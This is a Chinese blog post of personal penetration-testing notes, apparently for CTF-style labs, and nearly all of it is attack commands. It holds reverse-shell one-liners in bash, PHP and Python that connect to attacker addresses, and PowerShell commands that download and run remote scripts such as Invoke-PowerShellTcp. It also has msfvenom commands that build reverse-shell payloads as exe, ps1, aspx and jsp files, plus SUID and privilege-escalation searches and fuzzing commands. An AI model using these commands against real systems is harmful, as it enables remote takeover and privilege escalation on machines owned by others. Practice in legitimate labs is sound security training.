杂记-漏洞

代码

python bash交互页面

python3 -c 'import pty; pty.spawn("/bin/bash")'

反弹代码

bash反弹shell

/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'

php bash反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.30/4444 0>&1'");?>

php 脚本反弹shell

php -r '$sock=fsockopen("10.xxx.xxx.xx",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

python 脚本反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.xxx.xxx.xx",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

window文件

用dir命令查找文件

cmd

cd C:\ && dir user.txt /s /b

ps

Get-ChildItem -Path C:\ -Recurse  -Name *user.txt*
# powershell
# cmd.exe
# nc.exe
# temp
# public
# user.txt
# root.txt
命令说明
- /s是指列出当前目录包含子目录下的所有文件
- /b是仅列出文件名称,而日期、大小等其它信息则忽略

远程下载

  • 下载直接运行
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5/Sherlock.ps1'); Find-AllVulns"
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -port 4444
iex(new-object system.net.webclient).downloadstring("http://10.10.16.5/Sherlock.ps1")
  • 下载并保存
(new-object system.net.webclient).downloadfile("http://10.10.16.5/shell.exe","C:\Users\Public\shell.exe")

linux文件

grep 文件内容

grep -R -i root /home/* 2>/dev/null

find 搜索文件名

  • back
  • history
*back* *history*
find / -name "*back*" 2>/dev/null

find 用户组

find / -group user -type f 2>/dev/null 

find 用户有s权限

find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f -user root 2>/dev/null

在这里插入图片描述

find root主,其他用户也用执行或者写入权限

  • 命令解释:从根目录下开始查找 文件类型 属主是root 普通用户或组可执行 其他用户可写 如果发现了符合条件的用 ls -l命令显示 错误信息从定向到null
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

开启服务器

在这里插入图片描述

路由

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

window-快捷键

services.msc

  • 服务

regedit

  • 注册表

ncpa.cpl

  • 网络适配器

字典

wfuzz

  • /usr/share/wfuzz/wordlist/general/common.txt
# 参数
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.56.14//index.php?FUZZ=something
# 目录
wfuzz -w wordlist/general/common.txt --sc 200,301 http://testphp.vulnweb.com/FUZZ

公共

  • /usr/share/wordlists/rockyou.txt

工具

impacket

export PATH=/usr/share/doc/python3-impacket/examples:$PATH
smbserver.py share . -smb2support
# 一定是\\和\
copy \\10.10.16.5\share\winPEAS.exe .

git

  • 代理
-c "http.proxy=10.0.2.1:10811"

ftp

  • 匿名
anonymous

木马

msf

  • 注意shell还是meterpreter
  • 注意是否x64还是默认32

ps1

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=4545 --arch x64 --platform windows -f psh-reflection -o reverse.ps1

exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4445 -f exe -o shell.exe

aspx

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f aspx -o shell.aspx

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=443 -f raw -o shell.jsp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值